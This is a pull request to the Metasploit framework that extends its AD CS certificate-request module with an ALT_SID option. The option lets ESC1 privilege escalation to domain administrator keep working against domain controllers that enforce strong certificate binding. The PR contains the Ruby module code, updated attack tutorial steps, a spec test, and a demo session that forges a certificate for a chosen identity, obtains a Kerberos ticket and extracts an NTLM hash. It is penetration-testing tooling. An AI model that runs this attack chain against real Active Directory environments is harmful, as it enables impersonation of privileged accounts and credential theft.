### PR TITLE
Support Issuing Certificates With NTDS_CA_SECURITY_EXT

### DIFF
--- a/docs/metasploit-framework.wiki/ad-certificates/Attacking-AD-CS-ESC-Vulnerabilities.md
+++ b/docs/metasploit-framework.wiki/ad-certificates/Attacking-AD-CS-ESC-Vulnerabilities.md
@@ -335,9 +335,9 @@ With this we now have a list of certificates that can be utilized for privilege 
 
 # Using the ESC1 Vulnerability To Get a Certificate as the Domain Administrator
 Getting a certificate as the current user is great, but what we really want to do is elevate privileges if we can.
-Luckily we can also do this with the `icpr_cert` module. We just need to also set the `ALT_UPN` option to specify who we
-would like to authenticate as instead. Note that this only works with ESC1 vulnerable certificate templates which is why
-we can do this here.
+Luckily we can also do this with the `icpr_cert` module. We just need to also set the `ALT_SID` and `ALT_UPN` options to
+specify who we would like to authenticate as instead. Note that this only works with certificate templates that are
+vulnerable to ESC1 due to having the `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` flag set.
 
 If we know the domain name is `daforest.com` and the domain administrator of this domain is named `Administrator` we can
 quickly set this up:
@@ -356,6 +356,8 @@ msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass normalpass
 SMBPass => normalpass
 msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser normaluser
 SMBUser => normaluser
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set ALT_SID S-1-5-21-3402587289-1488798532-3618296993-1000
+ALT_SID => S-1-5-21-3402587289-1488798532-3618296993-1000
 msf6 auxiliary(admin/dcerpc/icpr_cert) > set ALT_UPN Administrator@daforest.com
 ALT_UPN => Administrator@daforest.com
 msf6 auxiliary(admin/dcerpc/icpr_cert) > run
@@ -363,6 +365,7 @@ msf6 auxiliary(admin/dcerpc/icpr_cert) > run
 
 [*] 172.30.239.85:445 - Requesting a certificate...
 [+] 172.30.239.85:445 - The requested certificate was issued.
+[*] 172.30.239.85:445 - Certificate SID: S-1-5-21-3402587289-1488798532-3618296993-1000
 [*] 172.30.239.85:445 - Certificate UPN: Administrator@daforest.com
 [*] 172.30.239.85:445 - Certificate stored at: /home/gwillcox/.msf4/loot/20221216143830_default_unknown_windows.ad.cs_338144.pfx
 [*] Auxiliary module execution completed

--- a/lib/msf/core/exploit/remote/kerberos/client/as_request.rb
+++ b/lib/msf/core/exploit/remote/kerberos/client/as_request.rb
@@ -85,7 +85,7 @@ module Msf
               from = opts.fetch(:from) { Time.at(0).utc }
               till = opts.fetch(:till) { Time.at(0).utc }
               rtime = opts.fetch(:rtime) { Time.at(0).utc }
-              nonce = opts.fetch(:nonce) { Rex::Text.rand_text_numeric(6).to_i }
+              nonce = opts.fetch(:nonce) { rand(1 << 24) }
               etype = opts.fetch(:etype) { Rex::Proto::Kerberos::Crypto::Encryption::DefaultOfferedEtypes }
               cname = opts.fetch(:cname) { build_client_name(opts) }
               realm = opts.fetch(:realm) { '' }

--- a/lib/msf/core/exploit/remote/kerberos/client/pkinit.rb
+++ b/lib/msf/core/exploit/remote/kerberos/client/pkinit.rb
@@ -29,7 +29,7 @@ module Msf
               dh = OpenSSL::PKey::DH.new(
                 OpenSSL::ASN1::Sequence([
                   OpenSSL::ASN1::Integer(prime_modulus),
-                  OpenSSL::ASN1::Integer(2),
+                  OpenSSL::ASN1::Integer(2)
                 ]).to_der
               )
               if OpenSSL::PKey.respond_to?(:generate_key)
@@ -195,9 +195,7 @@ module Msf
               ctime = opts.fetch(:ctime) { now_ctime }
               cusec = opts.fetch(:cusec) { now_time&.usec || 0 }
               nonce = opts.fetch(:nonce) { rand(1 << 31) }
-              # Request body needs to be tagged prior to encoding
-              request_body = OpenSSL::ASN1::ASN1Data.new([request_body.encode], 4, :CONTEXT_SPECIFIC)
-              data = request_body.to_der
+              data = request_body.encode
               checksum = Digest::SHA1.digest(data)
               pub_key_encoded = RASN1::Types::Integer.new(value: dh.pub_key.to_i).to_der
               auth_pack = Rex::Proto::Kerberos::Model::Pkinit::AuthPack.new(

--- a/lib/msf/core/exploit/remote/ms_icpr.rb
+++ b/lib/msf/core/exploit/remote/ms_icpr.rb
@@ -38,6 +38,7 @@ module Exploit::Remote::MsIcpr
       OptString.new('CA', [ true, 'The target certificate authority' ]),
       OptString.new('CERT_TEMPLATE', [ true, 'The certificate template', 'User' ]),
       OptString.new('ALT_DNS', [ false, 'Alternative certificate DNS' ]),
+      OptString.new('ALT_SID', [ false, 'Alternative object SID' ]),
       OptString.new('ALT_UPN', [ false, 'Alternative certificate UPN (format: USER@DOMAIN)' ]),
       OptPath.new('PFX', [ false, 'Certificate to request on behalf of' ]),
       OptString.new('ON_BEHALF_OF', [ false, 'Username to request on behalf of (format: DOMAIN\\USER)' ]),
@@ -51,6 +52,10 @@ module Exploit::Remote::MsIcpr
 
   def setup
     errors = {}
+    if datastore['ALT_SID'].present? && datastore['ALT_SID'] !~ /^S(-\d+)+$/
+      errors['ALT_SID'] = 'Must be a valid SID.'
+    end
+
     if datastore['ALT_UPN'].present? && datastore['ALT_UPN'] !~ /^\S+@[^\s\\]+$/
       errors['ALT_UPN'] = 'Must be in the format USER@DOMAIN.'
     end
@@ -102,7 +107,6 @@ module Exploit::Remote::MsIcpr
     raise MsIcprUnknownError, e.message
   end
 
-
   module_function
 
   def connect_ipc
@@ -146,6 +150,7 @@ module Exploit::Remote::MsIcpr
     user = opts[:username] || datastore['SMBUser']
     status_msg = "Requesting a certificate for user #{user}"
     alt_dns = opts[:alt_dns] || (datastore['ALT_DNS'].blank? ? nil : datastore['ALT_DNS'])
+    alt_sid = opts[:alt_sid] || (datastore['ALT_SID'].blank? ? nil : datastore['ALT_SID'])
     alt_upn = opts[:alt_upn] || (datastore['ALT_UPN'].blank? ? nil : datastore['ALT_UPN'])
     algorithm = opts[:algorithm] || datastore['DigestAlgorithm']
     status_msg << " - alternate DNS: #{alt_dns}" if alt_dns
@@ -155,6 +160,7 @@ module Exploit::Remote::MsIcpr
       cn: user,
       private_key: private_key,
       dns: alt_dns,
+      msext_sid: alt_sid,
       msext_upn: alt_upn,
       algorithm: algorithm
     )
@@ -205,12 +211,12 @@ module Exploit::Remote::MsIcpr
 
     return unless response[:certificate]
 
-    if (upn = get_cert_msext_upn(response[:certificate]))
-      print_status("Certificate UPN: #{upn}")
-    end
-
     if (sid = get_cert_msext_sid(response[:certificate]))
       print_status("Certificate SID: #{sid}")
+    end
+
+    if (upn = get_cert_msext_upn(response[:certificate]))
+      print_status("Certificate UPN: #{upn}")
     end
 
     pkcs12 = OpenSSL::PKCS12.create('', '', private_key, response[:certificate])
@@ -245,9 +251,10 @@ module Exploit::Remote::MsIcpr
   # @param [String] cn The common name for the certificate.
   # @param [OpenSSL::PKey] private_key The private key for the certificate.
   # @param [String] dns An alternative DNS name to use.
+  # @param [String] msext_sid An explicit SID to specify for strong identity mapping.
   # @param [String] msext_upn An alternative User Principal Name (this is a Microsoft-specific feature).
   # @return [OpenSSL::X509::Request] The request object.
-  def build_csr(cn:, private_key:, dns: nil, msext_upn: nil, algorithm: 'SHA256')
+  def build_csr(cn:, private_key:, dns: nil, msext_sid: nil, msext_upn: nil, algorithm: 'SHA256')
     request = OpenSSL::X509::Request.new
     request.version = 1
     request.subject = OpenSSL::X509::Name.new([
@@ -255,15 +262,28 @@ module Exploit::Remote::MsIcpr
     ])
     request.public_key = private_key.public_key
 
+    extensions = []
+
     subject_alt_names = []
     subject_alt_names << "DNS:#{dns}" if dns
     subject_alt_names << "otherName:#{OID_NT_PRINCIPAL_NAME};UTF8:#{msext_upn}" if msext_upn
     unless subject_alt_names.empty?
-      extension = OpenSSL::X509::ExtensionFactory.new.create_extension('subjectAltName', subject_alt_names.join(','), false)
+      extensions << OpenSSL::X509::ExtensionFactory.new.create_extension('subjectAltName', subject_alt_names.join(','), false)
+    end
+
+    if msext_sid
+      ntds_ca_security_ext = Rex::Proto::CryptoAsn1::NtdsCaSecurityExt.new(OtherName: {
+        type_id: OID_NTDS_OBJECTSID,
+        value: msext_sid
+      })
+      extensions << OpenSSL::X509::Extension.new(OID_NTDS_CA_SECURITY_EXT, ntds_ca_security_ext.to_der, false)
+    end
+
+    unless extensions.empty?
       request.add_attribute(OpenSSL::X509::Attribute.new(
         'extReq',
         OpenSSL::ASN1::Set.new(
-          [OpenSSL::ASN1::Sequence.new([extension])]
+          [OpenSSL::ASN1::Sequence.new(extensions)]
         )
       ))
     end

--- a/lib/msf/core/exploit/remote/ms_icpr.rb
+++ b/lib/msf/core/exploit/remote/ms_icpr.rb
@@ -15,7 +15,8 @@ module Exploit::Remote::MsIcpr
   include Msf::Exploit::Remote::DCERPC
   include Msf::Auxiliary::Report
 
-  NTDS_CA_SECURITY_EXT = '1.3.6.1.4.1.311.25.2'.freeze
+  # [2.2.2.7.7.4 szOID_NTDS_CA_SECURITY_EXT](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-wcce/e563cff8-1af6-4e6f-a655-7571ca482e71)
+  OID_NTDS_CA_SECURITY_EXT = '1.3.6.1.4.1.311.25.2'.freeze
   # [2.2.2.7.5 szOID_NT_PRINCIPAL_NAME](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wcce/ea9ef420-4cbf-44bc-b093-c4175139f90f)
   OID_NT_PRINCIPAL_NAME = '1.3.6.1.4.1.311.20.2.3'.freeze
   # [[MS-WCCE]: Windows Client Certificate Enrollment Protocol](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-winerrata/c39fd72a-da21-4b13-b329-c35d61f74a60)
@@ -347,7 +348,13 @@ module Exploit::Remote::MsIcpr
   # @param [OpenSSL::X509::Certificate] cert
   # @return [String, nil] The SID if it was found, otherwise nil.
   def get_cert_msext_sid(cert)
-    get_cert_ext_property(cert, NTDS_CA_SECURITY_EXT, OID_NTDS_OBJECTSID)
+    ext = cert.extensions.find { |e| e.oid == OID_NTDS_CA_SECURITY_EXT }
+    return unless ext
+
+    ntds_ca_security_ext = Rex::Proto::CryptoAsn1::NtdsCaSecurityExt.parse(ext.value_der)
+    return unless ntds_ca_security_ext[:OtherName][:type_id].value == OID_NTDS_OBJECTSID
+
+    ntds_ca_security_ext[:OtherName][:value].value
   end
 
   # Get the User Principal Name (UPN) from the certificate. This is a Microsoft specific extension.

--- a/lib/rex/proto/crypto_asn1.rb
+++ b/lib/rex/proto/crypto_asn1.rb
@@ -46,4 +46,20 @@ module Rex::Proto::CryptoAsn1
       bmp_string(:value)
     ]
   end
+
+  # see: [[MS-WCCE]: 2.2.2.7.7.4 szOID_NTDS_CA_SECURITY_EXT](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-wcce/e563cff8-1af6-4e6f-a655-7571ca482e71)
+  class NtdsCaSecurityExt < RASN1::Model
+    class OtherName < RASN1::Model
+      sequence :OtherName, implicit: 0, content: [
+        objectid(:type_id),
+        octet_string(:value, explicit: 0, constructed: true)
+      ]
+    end
+
+    sequence :NtdsCaSecurityExt,
+      constructed: true,
+      content: [
+        wrapper(model(:OtherName, OtherName))
+      ]
+  end
 end

--- a/spec/lib/rex/proto/crypto_asn1_spec.rb
+++ b/spec/lib/rex/proto/crypto_asn1_spec.rb
@@ -1,0 +1,41 @@
+# -*- coding:binary -*-
+require 'spec_helper'
+
+RSpec.describe Rex::Proto::CryptoAsn1::NtdsCaSecurityExt do
+  let(:encoded) do
+    "\x30\x40\xa0\x3e\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x19\x02\x01\xa0\x30" +
+      "\x04\x2e\x53\x2d\x31\x2d\x35\x2d\x32\x31\x2d\x33\x34\x30\x32\x35\x38" +
+      "\x37\x32\x38\x39\x2d\x31\x34\x38\x38\x37\x39\x38\x35\x33\x32\x2d\x33" +
+      "\x36\x31\x38\x32\x39\x36\x39\x39\x33\x2d\x31\x31\x30\x35"
+  end
+
+  describe '.parse' do
+    let(:decoded) { described_class.parse(encoded) }
+
+    it 'decodes OtherName correctly' do
+      expect(decoded[:OtherName]).to be_a RASN1::Model
+    end
+
+    it 'decodes type_id correctly' do
+      type_id = decoded[:OtherName][:type_id]
+      expect(type_id).to be_a RASN1::Types::ObjectId
+      expect(type_id.value).to eq '1.3.6.1.4.1.311.25.2.1'
+    end
+
+    it 'decodes value correctly' do
+      value = decoded[:OtherName][:value]
+      expect(value).to be_a RASN1::Types::OctetString
+      expect(value.value).to eq 'S-1-5-21-3402587289-1488798532-3618296993-1105'
+    end
+  end
+
+  describe '#to_der' do
+    it 'encodes correctly' do
+      instance = described_class.new(OtherName: {
+        type_id: '1.3.6.1.4.1.311.25.2.1',
+        value: 'S-1-5-21-3402587289-1488798532-3618296993-1105'
+      })
+      expect(instance.to_der).to eq encoded
+    end
+  end
+end


### PR DESCRIPTION
This adds support to the `icpr_cert` module to issue certificates for an explicit SID by specifying it within the [NTDS_CA_SECURITY_EXT](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-wcce/e563cff8-1af6-4e6f-a655-7571ca482e71). Prior to this PR, if the server added this extension, it would be parsed using `#get_cert_ext_property` but it couldn't be included in the request. Including it in the request is required now when targeting servers with the [KB5014754](https://support.microsoft.com/en-us/topic/kb5014754-certificate-based-authentication-changes-on-windows-domain-controllers-ad2c23b0-15d8-4340-a468-4d4f3b188f16) patch applied and the `StrongCertificateBindingEnforcement` REG_DWORD value set to 2. Including it in the request will be required by default in November of this year when Microsoft changes the default value of this from 1 to 2. The default value is used when the item is not present in the registry.

Making these changes now ensures that Metasploit is ready for this change and that users will continue to be able to exploit ESC1 just with the extra step of needing to find and set the SID. Users can get the SID using the ldap_query module. Metasploit also currently supports exploit ESC2, ESC3 and ESC4. When I tested my fully patched Server 2019 instance, certificates that were requested using `ON_BEHALF_OF` and `PFX` would include the SID in their response. ESC4 makes a certificate template vulnerable to ESC1 which will also continue to work. This means our currently supported attacks of ESC1-4 will continue to work by default after November.

For additional context on these changes, see the following references which I found helpful:
* https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7
* https://posts.specterops.io/certificates-and-pwnage-and-patches-oh-my-8ae0f4304c1d
* https://elkement.blog/2023/03/30/lord-of-the-sid-how-to-add-the-objectsid-attribute-to-a-certificate-manually/

### PKINIT Changes
The AS-REQ request used as part of PKINIT functionality had to be updated in order to work with the new certificate. The underlying issue was in the data that was being signed which caused the signature validation to fail and an integrity error to be raised.

## Verification

- [ ] [Install AD CS](https://docs.metasploit.com/docs/pentesting/active-directory/ad-certificates/overview.html#installing-ad-cs)
- [ ] [Setup a certificate template that is vulnerable to ESC 1](https://docs.metasploit.com/docs/pentesting/active-directory/ad-certificates/overview.html#setting-up-a-esc1-vulnerable-certificate-template)
- [ ] Ensure that your target server is fully patched
- [ ] Make the required registry change `REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Kdc /v StrongCertificateBindingEnforcement /t REG_DWORD /d 2`
- [ ] Reboot the server
- [ ] Use the icpr_cert module and follow the steps to [exploit ESC1](https://docs.metasploit.com/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html#using-the-esc1-vulnerability-to-get-a-certificate-as-the-domain-administrator)
- [ ] Make sure you set the `ALT_SID` datastore option to the SID of the target account
- [ ] Validate that the certificate that was issued is able to be used with the `auxiliary/admin/kerberos/get_ticket` module
    * If the extension is not present in the certificate or the SID is incorrect, the operation will fail with `KDC_ERR_CERTIFICATE_MISMATCH`
    * If the ALT_SID datastore is not specified, the certificate will still be issued so it's important to test it with the `auxiliary/admin/kerberos/get_ticket` module

## Demo
```
msf6 auxiliary(admin/dcerpc/icpr_cert) > show options 

Module options (auxiliary/admin/dcerpc/icpr_cert):

   Name           Current Setting                                 Required  Description
   ----           ---------------                                 --------  -----------
   ALT_DNS                                                        no        Alternative certificate DNS
   ALT_SID        S-1-5-21-3402587289-1488798532-3618296993-1000  no        Alternative object SID
   ALT_UPN        smcintyre@msflab.local                          no        Alternative certificate UPN (format: USER@DOMAIN)
   CA             msflab-DC-CA                                    yes       The target certificate authority
   CERT_TEMPLATE  ESC1-Test                                       yes       The certificate template
   ON_BEHALF_OF                                                   no        Username to request on behalf of (format: DOMAIN\USER)
   PFX                                                            no        Certificate to request on behalf of
   RHOSTS         192.168.159.10                                  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT          445                                             yes       The target port (TCP)
   SMBDomain      .                                               no        The Windows domain to use for authentication
   SMBPass        Password1!                                      no        The password for the specified username
   SMBUser        aliddle                                         no        The username to authenticate as


Auxiliary action:

   Name          Description
   ----          -----------
   REQUEST_CERT  Request a certificate



View the full module info with the info, or info -d command.

msf6 auxiliary(admin/dcerpc/icpr_cert) > run
[*] Running module against 192.168.159.10

[+] 192.168.159.10:445 - The requested certificate was issued.
[*] 192.168.159.10:445 - Certificate SID: S-1-5-21-3402587289-1488798532-3618296993-1000
[*] 192.168.159.10:445 - Certificate UPN: smcintyre@msflab.local
[*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20230608135200_default_192.168.159.10_windows.ad.cs_037584.pfx
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/icpr_cert) > previous 
msf6 auxiliary(admin/kerberos/get_ticket) > get_hash CERT_FILE=/home/smcintyre/.msf4/loot/20230608135200_default_192.168.159.10_windows.ad.cs_037584.pfx
[*] Running module against 192.168.159.10

[+] 192.168.159.10:88 - Received a valid TGT-Response
[*] 192.168.159.10:88 - TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230608135208_default_192.168.159.10_mit.kerberos.cca_991378.bin
[*] 192.168.159.10:88 - Getting NTLM hash for smcintyre@msflab.local
[+] 192.168.159.10:88 - Received a valid TGS-Response
[*] 192.168.159.10:88 - TGS MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230608135208_default_192.168.159.10_mit.kerberos.cca_738323.bin
[+] Found NTLM hash for smcintyre: aad3b435b51404eeaad3b435b51404ee:07d128430a6338f8d537f6b3ae1dc136
[*] Auxiliary module execution completed
msf6 auxiliary(admin/kerberos/get_ticket) > previous 
msf6 auxiliary(admin/dcerpc/icpr_cert) > run ALT_SID=""
[*] Running module against 192.168.159.10

[+] 192.168.159.10:445 - The requested certificate was issued.
[*] 192.168.159.10:445 - Certificate UPN: smcintyre@msflab.local
[*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20230608135215_default_192.168.159.10_windows.ad.cs_708469.pfx
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/icpr_cert) > previous 
msf6 auxiliary(admin/kerberos/get_ticket) > get_hash CERT_FILE=/home/smcintyre/.msf4/loot/20230608135215_default_192.168.159.10_windows.ad.cs_708469.pfx
[*] Running module against 192.168.159.10

[-] Auxiliary aborted due to failure: unknown: Kerberos Error - KDC_ERR_CERTIFICATE_MISMATCH (66) - PKINIT - KDC_ERR_CERTIFICATE_MISMATCH
[*] Auxiliary module execution completed
msf6 auxiliary(admin/kerberos/get_ticket) > 
```